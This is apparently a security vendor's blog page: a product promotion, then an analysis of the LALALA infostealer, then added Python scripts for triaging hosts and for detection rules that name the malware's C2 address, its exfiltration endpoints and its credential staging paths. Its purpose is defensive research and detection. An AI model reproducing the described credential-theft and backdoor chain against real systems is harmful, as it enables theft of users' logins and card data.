  • This week, a huge batch of card details stolen over the Thanksgiving shopping period appeared for sale online, with a price tag of half a million dollars. Successful use of Magecart card-skimming software is the most likely to blame.

In Case You Missed It

Smarter Cybersecurity: How SecOps Can Simplify Security Management, Oversight & Real-Time Decision-Making

Organizations continue to be alarmed by how easily cybercriminals can circumvent security defenses as malware, ransomware, cryptojacking and phishing attacks make headline news.

In addition, security operations lack visibility and awareness of unsafe network and user activities, network traffic irregularities, and unusual data access and utilization. This exacerbates the situation and creates a dangerous condition where security teams are too late or unable to:

  • Respond to security alerts or incidents at the speed and accuracy they need
  • Conduct thorough and effective investigations
  • Find answers fast enough to take corrective actions

Through close engagements with our top channel partners and key customers, SonicWall learned and understood these challenges first-hand. And through that collaboration, SonicWall developed and introduced the SonicWall Capture Security Center and two powerful risk management tools — Analytics and Risk Meters — to help customers solve these difficult problems.

Govern, comply and manage risk

The Capture Security Center is grounded on three core objectives:

‘Govern Centrally’ focuses on improving operational efficiencies and reducing overhead, while ‘Compliance’ and ‘Risk Management’ concentrate on the business value. These core objectives are interdependent as each leverages a common set of information, processes and technologies that help SecOps establish and deliver a strong, federated security defense and response services at the core of their security program.

Work faster and smarter — with less effort

Capture Security Center is a cloud solution organizations use to avoid operational overhead associated with software and hardware installation, upgrades and maintenance. This solution provides SecOps teams secure single sign-on (SSO) access to license, provision and manage their entire SonicWall security suite, including network, wireless, endpoint, email, mobile and cloud security products and services.

Think of it as a high-productivity tool that provides authorized users access to all available security services based on their role and access rules. The command console is accessible from any location and from any web-enabled PC. Once signed in, users are automatically granted access to everything — and are able to do everything securely — using one cloud app.

The different tiles (shown below) are exactly what you’ll see when you log in to your Capture Security Center account. Users can easily navigate between tenants presented on the left panel and, on the right panel, manage any licensed cloud services registered to that tenant.

Available in January 2020, Capture Security Center version 1.8 adds capabilities for security teams to:

Study risks and threats in real time with real-world data

SonicWall Risk Meters is a threat monitoring and risk-rating tool we’ve integrated into the Capture Security Center. The tool is available to all SonicWall Capture Security Center customers at no additional cost.

Risk Meters, shown below, gives a direct line of sight into the cyberattacks affecting your security posture. Threat vectors are represented by colored arrows while threat types are shown as icons.

Clicking on an icon pops up an information panel that provides a detailed description of the threat. A tenant drop-down list allows you to view threat metrics at the tenant level. Visibility into the attacks targeting various defense layers helps guide your response to where immediate defensive actions are needed for a specific environment.

The first defense layer captures attacks blocked by the firewalls, Capture Advanced Threat Protection (ATP) sandbox and WAF.

The second defense layer reveals attacks targeting your SaaS appliances and email environments.

The third defense layer shows threats attacking your users’ devices. The DEFCON and Shield Level ratings displayed at the top-right corner provide the computed risk scores based on existing defense layers. Scores are adjusted as you toggle to activate or deactivate available services.

Taking this a step further, Risk Meters gains several important improvements in Capture Security Center 1.8. A new control panel presents users with customization functionalities to run analysis on a variety of threat data.

This new feature allows users to experiment with “what-if” simulations at a more granular level and see how the risk score changes dynamically when sub-components of a certain layer, or of multiple layers, are added or removed.

Up until this release, risk scores were calculated based solely on security services from SonicWall. To give a more accurate account of customer security environments, CSC now factors in all security controls when calculating the risk scores, including non-SonicWall services.

The Risk Meters Control Panel allows users to configure and weigh third-party security controls into the calculated risk scores. Users can now review trends of different threat types and then compare them against regional and global averages to help identify which threat vectors to focus on and where to prepare their defenses.

Transforming threat data into decisions, decisions into actions

In conjunction with Capture Security Center 1.8, SonicWall releases Analytics 2.5 to introduce a new user-based analytics and reporting function that helps security teams visualize and conduct investigations into users’ actions and application and data usage.

Security teams can monitor or drill down into the security data for more details about user network traffic, access and connections, which applications are being used and which websites are frequently visited.

Also, security teams can investigate attacks that target a certain group of users and bandwidth costs associated with resource utilization to determine if policy-tuning or added configurations are needed to reduce their risk profile or optimize network performance.


About the SonicWall Capture Security Center

Capture Security Center is a scalable cloud security management system that’s a built-in and ready-to-use component of your SonicWall product or service. It features single-sign-on and ‘single-pane-of-glass’ management. It integrates the functionality of the Capture Cloud Platform to deliver robust security management, analytics and real-time threat intelligence for your entire portfolio of network, email, endpoint, mobile and cloud security resources.

Capture Security Center delivers a valuable team resource to help organizations control assets and defend entire networks from cyberattacks. Unify and synchronize updates and support, monitor security risks and fulfill regulatory compliance — all with greater clarity, precision and speed.

LALALA InfoStealer comes as a Batch and PowerShell scripting combo

Malware authors are using simple but very effective approaches to stay under the radar and steal users’ data. The SonicWall RTDMI™ engine recently detected a Windows shortcut file (LNK) inside an ISO image which downloads and executes the LALALA infostealer on the victim’s machine. LALALA infostealer is a batch script that relies on PowerShell to steal the victim’s data and send it to the server:

The LNK file copies itself to “%TEMP%\htn90.bat” and executes the batch script. The malware is intended to run only once on the victim’s machine: the batch script checks for the presence of “%TEMP%\htn.txt” and, if the file is already present, terminates and deletes itself. Otherwise it writes “htn” into “%TEMP%\htn.txt”. The batch script then downloads an archive file “%TEMP%\htn.rar” and a WinRAR (compression tool) executable “%TEMP%\rar.exe” from the Uniform Resource Locator (URL) h[t][t]p://185.183.96.54/[filename].

The batch script extracts the LALALA infostealer “htn.bat”, an image file “lebenslauf_2019_11_20.jpeg” and an executable “sqlite3.exe” from “%TEMP%\htn.rar” using the WinRAR executable:

The batch script displays the “lebenslauf_2019_11_20.jpeg” image to the user; it contains the message “ERROR 0x89976 IMAGE BROKEN”, to make the victim believe the LNK file is simply broken. The batch script then executes the LALALA infostealer “%TEMP%\htn.bat”:
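For responders who need to confirm whether this dropper ran on a host, the following Python script is an added example (not SonicWall code and not part of the original write-up). It checks a %TEMP% directory for the file and directory names reported in this analysis and, because the malware deletes everything except “%TEMP%\htn.txt” when it finishes, distinguishes a machine that is still staging data from one where the dropper already ran and cleaned up. The verdict labels and the throwaway sample directory it builds for offline use are the example's own assumptions.

```python
"""Host triage helper for the LALALA dropper's on-disk artifacts.

Added example, not SonicWall code. The artifact names come from the
write-up; the role descriptions and verdict labels are this example's own.
"""
import os
import tempfile

# File and directory names the write-up reports under %TEMP%.
ARTIFACTS = {
    "htn.txt": "run-once marker, the only file the malware leaves behind",
    "htn90.bat": "copy of the LNK payload (batch dropper)",
    "htn.rar": "downloaded archive holding the infostealer and helpers",
    "rar.exe": "downloaded WinRAR used for extraction and for packing stolen data",
    "htn.bat": "LALALA infostealer script",
    "lebenslauf_2019_11_20.jpeg": "decoy 'IMAGE BROKEN' picture shown to the victim",
    "sqlite3.exe": "sqlite3 used to read the copied browser databases",
    "jjghgjhfyt6": "staging directory for stolen data",
}


def scan_temp_for_lalala(temp_dir):
    """Return {name: role} for LALALA artifacts found directly under temp_dir."""
    found = {}
    try:
        entries = set(os.listdir(temp_dir))
    except FileNotFoundError:
        return found
    for name, role in ARTIFACTS.items():
        if name in entries:
            found[name] = role
    # The backdoor script and the exfil archive carry random names, so any
    # .vbs or unexpected .rar sitting directly in %TEMP% is reported as well.
    for name in sorted(entries):
        lower = name.lower()
        if lower.endswith(".vbs") or (lower.endswith(".rar") and name not in ARTIFACTS):
            found[name] = "unnamed .vbs/.rar in %TEMP% (possible [random].vbs backdoor or [random].rar archive)"
    return found


def verdict(found):
    """Assumed labels: 'clean', 'ran-and-cleaned' (marker only) or 'active'."""
    if not found:
        return "clean"
    if set(found) == {"htn.txt"}:
        return "ran-and-cleaned"
    return "active"


def marker_matches(temp_dir):
    """True if htn.txt holds the literal 'htn' the dropper writes."""
    try:
        with open(os.path.join(temp_dir, "htn.txt"), encoding="utf-8", errors="replace") as f:
            return f.read().strip() == "htn"
    except OSError:
        return False


def build_sample_temp(files=("htn.txt",), dirs=()):
    """Constructed sample: a throwaway directory standing in for %TEMP%."""
    d = tempfile.mkdtemp(prefix="lalala-sample-")
    for name in files:
        with open(os.path.join(d, name), "w", encoding="utf-8") as f:
            f.write("htn" if name == "htn.txt" else "")
    for name in dirs:
        os.mkdir(os.path.join(d, name))
    return d


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        target = sys.argv[1]            # explicit directory to triage
    elif "TEMP" in os.environ:
        target = os.environ["TEMP"]     # the real %TEMP% on a Windows host
    else:
        target = build_sample_temp()    # offline demo on a constructed directory
    hits = scan_temp_for_lalala(target)
    for name, role in hits.items():
        print(f"{name}: {role}")
    print("verdict:", verdict(hits))
```

Run it with the path to a user's %TEMP% directory (or with no argument on Windows, where it reads %TEMP%). A “ran-and-cleaned” verdict means the data was most likely already uploaded and the host needs credential resets even though nothing else remains on disk.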

LALALA InfoStealer:

The malware creates the directory “%TEMP%\jjghgjhfyt6” to store the stolen data. It uses a PowerShell command to collect information about installed programs and saves it to “%TEMP%\jjghgjhfyt6\proglist.txt”:

BACKDOOR ACTIVITY:

The malware opens a backdoor for the malware author by scheduling a task that executes the VBScript “%TEMP%\[random].vbs” every minute. The result of a web request to “185.183.96.54/gate990.php” is passed to the VBScript as an argument, and the VBScript contains the code to execute that argument:

DATA EXFILTRATION:

Malware usually processes the data on the victim’s machine to extract only the precise information that is sent to the malware server. LALALA, by contrast, sends a large amount of data to the server, which then needs further processing at the server’s end to extract the useful data. The malware does decrypt some applications’ data (e.g. Google Chrome and Microsoft Edge) on the victim’s machine, because that data is protected with Windows logon-based encryption and cannot be decrypted on another machine.

The malware steals login information from the following applications:

  • Google Chrome
  • Mozilla Firefox
  • Microsoft Edge
  • Mozilla Thunderbird
  • Microsoft Outlook

The malware copies the Chrome data files “cookies”, “Login Data” and “Web Data” from “%LOCALAPPDATA%\Google\Chrome\User Data\Default” to “%TEMP%\jjghgjhfyt6\”. It then decrypts card details, cookies and passwords and saves them into “%TEMP%\jjghgjhfyt6\”:

The malware copies data files from Mozilla Thunderbird and Mozilla Firefox to “%TEMP%\jjghgjhfyt6”:

The malware terminates the “taskhost” and “dllhost” processes, then decrypts login passwords from Microsoft Edge and saves them into “%TEMP%\jjghgjhfyt6\edg_[random]”:

The malware decrypts and saves Outlook data into “%TEMP%\jjghgjhfyt6\outloo_[random]”:

NETWORK:

The malware compresses the stolen data with the WinRAR executable into “%TEMP%\[random].rar” and sends the compressed file to “185.183.96.54/zit.php”. It then deletes the stolen data files and its own component files, leaving only “%TEMP%\htn.txt”:

At the time of writing, the file is detected by only a few security vendors on the popular threat intelligence sharing portal VirusTotal, which indicates its spreading potential:

Evidence of the detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:
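The backdoor task (BACKDOOR ACTIVITY) and the download, beaconing and exfiltration traffic (NETWORK) described in this write-up translate directly into endpoint detection rules. The Python below is an added example, not SonicWall code; it runs a few behaviour rules over constructed Sysmon-style JSON events (the event shape and field names, the user path, the task name and the “random” file names are assumptions) and flags only what this analysis reports: traffic to 185.183.96.54 and its gate990.php/zit.php endpoints, WinRAR launched from %TEMP%, a task that runs a .vbs from %TEMP% every minute, the taskhost/dllhost kills, and files landing in the jjghgjhfyt6 staging directory.

```python
"""Behaviour rules for the LALALA chain over endpoint telemetry.

Added example, not SonicWall code. Indicators (C2 address, endpoint
paths, staging directory) come from the write-up; the JSON event shape
and the sample events are constructed for offline use.
"""
import json
import re

C2_IP = "185.183.96.54"                   # C2 address from the write-up
C2_PATHS = ("/gate990.php", "/zit.php")   # backdoor poll and exfil upload endpoints
STAGING_DIR = "jjghgjhfyt6"               # staging directory from the write-up

# Constructed Sysmon-style telemetry (assumed keys: type, image, cmd, dst_ip,
# url, path, interval_min, action). User name, task name and file names are
# illustrative only; the remote-IP event uses a documentation address.
SAMPLE_EVENTS = r'''
{"ts":"2019-11-21T10:02:11Z","type":"process","image":"C:\\Windows\\System32\\cmd.exe","cmd":"cmd /c C:\\Users\\v\\AppData\\Local\\Temp\\htn90.bat"}
{"ts":"2019-11-21T10:02:12Z","type":"network","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","dst_ip":"185.183.96.54","dst_port":80,"url":"http://185.183.96.54/htn.rar"}
{"ts":"2019-11-21T10:02:15Z","type":"process","image":"C:\\Users\\v\\AppData\\Local\\Temp\\rar.exe","cmd":"rar.exe x C:\\Users\\v\\AppData\\Local\\Temp\\htn.rar"}
{"ts":"2019-11-21T10:02:20Z","type":"task","name":"Updater","interval_min":1,"action":"wscript C:\\Users\\v\\AppData\\Local\\Temp\\k3j2.vbs"}
{"ts":"2019-11-21T10:02:25Z","type":"file","image":"C:\\Windows\\System32\\cmd.exe","path":"C:\\Users\\v\\AppData\\Local\\Temp\\jjghgjhfyt6\\Login Data"}
{"ts":"2019-11-21T10:02:30Z","type":"process","image":"C:\\Windows\\System32\\taskkill.exe","cmd":"taskkill /f /im dllhost.exe"}
{"ts":"2019-11-21T10:03:01Z","type":"network","image":"C:\\Windows\\System32\\wscript.exe","dst_ip":"185.183.96.54","dst_port":80,"url":"http://185.183.96.54/gate990.php"}
{"ts":"2019-11-21T10:05:00Z","type":"network","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","dst_ip":"185.183.96.54","dst_port":80,"url":"http://185.183.96.54/zit.php"}
{"ts":"2019-11-21T10:06:00Z","type":"network","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","dst_ip":"203.0.113.10","dst_port":443,"url":"https://www.example.com/"}
'''


def _in_temp(path):
    """True when a path or command line refers to the user's %TEMP% directory."""
    return "\\temp\\" in path.lower()


def evaluate(event):
    """Apply the LALALA rules to one event; returns a list of (rule_id, detail)."""
    hits = []
    kind = event.get("type")
    image = event.get("image", "").lower()
    cmd = event.get("cmd", "").lower()
    if kind == "network":
        if event.get("dst_ip") == C2_IP:
            url = event.get("url", "")
            stage = "beacon/exfil" if url.endswith(C2_PATHS) else "download"
            hits.append(("LALALA-C2", f"{stage} to {C2_IP}: {url}"))
    elif kind == "process":
        if image.endswith("\\rar.exe") and _in_temp(image):
            hits.append(("LALALA-RAR", "WinRAR executed from %TEMP% (extraction or packing of stolen data)"))
        if image.endswith("\\taskkill.exe") and re.search(r"/im\s+(dllhost|taskhost)", cmd):
            hits.append(("LALALA-KILL", "taskhost/dllhost terminated before Edge credential theft"))
        if image.endswith("\\cmd.exe") and ".bat" in cmd and _in_temp(cmd):
            hits.append(("LALALA-BAT", "batch file launched from %TEMP% (low confidence on its own)"))
    elif kind == "task":
        action = event.get("action", "").lower()
        if event.get("interval_min") == 1 and action.endswith(".vbs") and _in_temp(action):
            hits.append(("LALALA-TASK", "scheduled task runs a .vbs from %TEMP% every minute"))
    elif kind == "file":
        if STAGING_DIR in event.get("path", "").lower():
            hits.append(("LALALA-STAGE", "file written to the jjghgjhfyt6 staging directory"))
    return hits


def detect(jsonl):
    """Run every rule over JSON-lines telemetry; returns [(ts, rule_id, detail)]."""
    findings = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for rule_id, detail in evaluate(event):
            findings.append((event.get("ts", ""), rule_id, detail))
    return findings


def summarize(findings):
    """Count hits per rule; several distinct rules on one host is the real signal."""
    counts = {}
    for _, rule_id, _ in findings:
        counts[rule_id] = counts.get(rule_id, 0) + 1
    return counts


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for ts, rule_id, detail in found:
        print(ts, rule_id, detail)
    print("rules fired:", summarize(found))
```

Any one rule on its own is weak (a .bat launched from %TEMP% is common in legitimate installers), so summarize() counts distinct rules; several of them firing on the same host within a few minutes, with the C2 address present, is what should drive escalation and credential resets.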